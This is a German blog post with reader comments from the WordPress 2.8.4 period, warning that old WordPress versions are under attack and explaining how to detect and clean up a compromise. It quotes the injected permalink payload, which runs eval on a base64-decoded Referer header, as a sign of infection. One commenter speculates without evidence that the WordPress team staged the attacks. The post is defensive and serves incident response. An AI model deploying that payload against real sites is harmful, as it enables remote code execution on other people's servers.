So wie es momentan ausschaut stehen schon einige WordPress-Weblogs, auf denen alte Versionen zum Einsatz kommen, unter Beschuss. Die Devise ist es euren bzw. eure WordPress-Weblogs so schnell wie möglich auf die neueste Version zu aktualisieren.
Hinweise auf den Angriff
Es gibt zwei Hinweise dass dein Weblog attackiert beziehungsweise gehackt wurde. Zum einen gibt es einen weiteren Administrator. Also bitte in der Benutzerverwaltung prüfen ob bei euch nicht ein neuer Administrator eingerichtet wurde.
Zum anderen wurde die Permalinkstruktur geändert:
[...]/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/[...]
Wichtig in diesem Zusammenhang sind die Begriffe eval und base64.
Gehackt und was nun?
Falls dein altes WordPress-Weblog gehackt wurde, dann wird momentan folgendes empfohlen: nicht die MySQL-Datenbank sichern sondern den Blog-Inhalt mit der WordPress-eigenen Funktion (“Werkzeuge” » “Daten exportieren”) exportieren. Anschließend die eigenen Dateien von /wp-content/ und die wp-config.php sichern und dann die Installation inkl. Datenbank komplett löschen.
In diesem Zug wäre es auch ratsam mal die Passwörter bei dem Hoster (FTP, DB etc.) zu aktualisieren. Danach WordPress neu installieren, die eigenen Dateien hochladen und dann die exportierte XML-Datei importieren … und natürlich nicht vergessen einen ganz neuen Administrator (individueller Nutzername und neues Passwort) zu erstellen und den automatisch generierten Admin-Account hinterher zu löschen.
Wie schütze ich mich beziehungsweise meine WordPress-Installation
Momentan schaut es so aus, dass die aktuelle Version von WordPress (2.8.4) vor solchen Angriffen sicher ist. Also würde ich jedem empfehlen, der eine alte WordPress-Version nutzt, so schnell wie möglich zu aktualisieren.
Ich wünsche euch hierbei viel Glück, Erfolg und eine saubere WordPress-Installation.
Quellen: Lorelle on WordPress und WPBeginner.com. Via Twitter beziehungsweise via Frank Bültge.
Falls jemand weitere Vorschläge, Hinweise und Korrekturen hat: einfach einen Kommentar abgeben. Vielen Dank!
Wir arbeiten seit 20 Jahren mit WordPress und bieten diverse Dienstleistungen rund um das System an. Kontaktiere uns für weitere Informationen oder für ein Angebot.
[…] Vlad Perun in seinem Blog berichtet, stehen alte WordPress-Versionen aktuell unter Beschuss, erkennbar an einem neuen Admin-Konto und […]
Ich hatte heute morgen auf Twitter auf die Problematik hingewiesen und gleichzeitig einen Link mit eleganter Lösung angehängt, die das Problem in wenigen Klicks beseitigt. Aber wer liest schon meinen Twitter-Stream, ne 😉
@Sergej,
danke für den Link. Mir persönlich wäre der einfache Weg zu brenzlig, aber ich bin auch kein Sicherheitsexperte.
Jederzeit, wo solche Sicherheitsalerts die Runde machen, frage ich mich: WIE OFT sollte man die WordPress-Nutzer auf die Absicherung des Administrationsbereichs hinweisen? Denn all diese Attacken würden ins Leere laufen, wenn das Backend dicht wäre – mit einfachem simplen .htaccess-Eintrag.
Ich hatte meinen Artikel mit den 10 Ratschlägen im eigenen Blog und bei Smashing Magazine veröffentlicht. Müsste doch jeder kennen oder? 😉 Aber nein, im Februar auf dem WordCamp hatten alle über den Artikel gelacht und als nutzlos betrachtet.
Aber das ist immer so: Sicherheitstipps ignorieren und später Stunden, Tage beim Restoren der Daten verbringen. Naja, aus Fehlern lernt man, hoffentlich.
Hallo,
ich war zum Glück nicht von dem Hack betroffen jedoch liest man auf fieser-admin.de, dass der weitere Administrator im WP-Adminbereich nicht sichbar sein soll!
Ist vielleicht noch mal interessant zu erwähnen!
@Sergej,
was du in dem Zusammenhang nicht vergessen darfst ist z. B. die Tatsache, dass viele Hoster keinen Zugriff auf die .htaccess erlauben. Damit sind z B. viele Schutzmaßnahmen nicht möglich.
Und auch all-inkl bietet standardmäßig lediglich den Einsatz von SSL-Proxy (https://ssl-account.com/domain.de) damit kann man dann auch nicht den Admin-Bereich verschlüsseln … zumindest
define('FORCE_SSL_ADMIN', true);
erwartet https://www.domain.de. Hier müsste man schauen welche Möglichkeiten es noch gibt.[…] perun.net und fieser-admin.de empfehlen derzeit unbedingt auf WordPress 2.8.4 zu aktualisieren, sofern noch eine alte Version zum Einsatz kommt. Der Blog auf fieser-admin.de wurde bereits attackiert. […]
@Perun
Schon richtig. Will nur zum Ausdruck bringen, dass man selbst als Betreiber aktiv werden sollte und nicht notwendige, von extern zugängliche Funktionen wie z.B. die Nutzeranmeldung abschalten.
Ich bin der Meinung, dass man dann doch den Hoster wechseln sollte als Opfer einer Attacke zu werden. Aber du hast schon Recht, jeder entscheidet selbst. Finde ich nur schade.
Danke für den Hinweis auf den Angriff. Glücklicherweise habe ich es trotz des hohen Speicherbedarfs von WordPress 2.8.x geschafft, alle meine Blogs schon auf WP 2.8.4 zu aktualisieren.
Der Artikel von Sergej mit den 10 Sicherheitsratschlägen ist lesens- und befolgenswert. Mit den richtigen Schutzmaßnahmen in der .htaccess-Datei kann man schon deutlich das Schutzniveau erhöhen.
Darüber hinaus werde ich mir das Sicherheitskapitel aus dem neuen Buch von Frank Bültge in Kürze durchlesen und so gut es geht umsetzen.
[…] nachdem es bei Perun oder bei Marcel bekannt gegeben wurde, habe ich mich ja mal gewogen gefühlt, doch noch auf die […]
Was sind denn die “alten Versionen”? Zählt die 2.7 auch schon dazu? Wenn ja, dann werde ich demnächst WordPress endgültig den Rücken kehren. Denn, so wie Dieter es schon schrieb, hat nicht jeder den passenden Server parat der das Speicher-Monster WordPress noch beherrscht. Auch hat nicht jeder Bedarf für unzähligen Funktionen die Wp bereit stellt, sondern hätte lieber weiterhin ein einfaches (!) Blogsystem mit dem man schlichtweg bloggen kann.
In den Zusammenhang einfach mal darauf verweisen auf die neueste Version upzudaten, finde ich, gelinde gesagt, arm. Gerade wenn man von einer etwas älteren WP-Version auf die aktuellste updatet, häufen sich die Probleme.
Die Frage die mich am brennendsten interessieren würde, wie der Hack nämlich zustande kam, wird leider nicht beantwortet. Lag es daran das die betroffenen Blogs so “sichere” Passwörter wie “Schatzi” und “1234” verwendet haben? Dann kann man sich das Updaten gleich mal sparen. Genauso wie man sich in so einem Fall den .htaccess-Schutz schenken kann.
Oder sind die Angreifer (mal wieder) über eine Schwachstelle in WP in das System eingedrungen? Dann ist es irgendwie nur eine Frage der Zeit bis eine vergleichbare Schwachstelle auch in der neusten Version auftaucht und das Spiel von vorne los geht.
Ich habe so langsam das Gefühl das solche Angriffe vom WordPress-Team initiiert werden damit die Leute ja auch alle brav auf die neueste Version updaten und man sich um die älteren Versionen nicht mehr kümmern muss.
Ralf, es sind wirklich alle WP-Versionen betroffen, außer der zZ. aktuellen.
[…] Ein sicheres Indiz sind wohl aber geänderte Permalinks (siehe hierzu den Blogbeitrag “Alte WordPress-Versionen unter Beschuss” von […]
@Dieter,
ich höre von einigen Leuten, dass bei denen der Speicherverbrauch zu hoch sei. Ich setze mittlerweile mehr als 26 Plugins ein und auch die deutsche Sprachdatei und bei mir liegt der Speicherverbrauch bei 22,7mb (35%).
Könnte hier nicht evtl. die Servereinstellung oder z. B. der Einsatz der Versions-Verwaltung der Artikel eine Rolle spielen? Frage an die Server-Experten.
Nachtrag: habe jetzt die Antwort auf meine Frage gefunden.
[…] Pflichtlink – WordPress unter Beschuss […]
[…] Infos gibt es bei Perun, des weiteren kann ich nur jedem Blogger den Artikel “Sicherheit in WordPress: 10 Schritte […]
[…] This post was mentioned on Twitter by Jan Schnitzler, Soziserver, Christoph Hörl, uploadmag and others. Jan Schnitzler said: Guten Morgen und Achtung an alle #WordPress Nutzer: #Angriffe auf alte Versionen, ggf. updaten! >>> http://bit.ly/wAs25 […]
Bei mir war das Problem mit der Peramlinkstruktur, aber einen weiteren Administrator wurde keiner angelegt….!!
Andy, denkst du auch dran, dass der “Administrator” unsichtbar gemacht wurde…
[…] Ausschließlich WordPress 2.8.4 gilt derzeit als sicher. Das Schlimme: Alle anderen Versionen sind ausnahmslos […]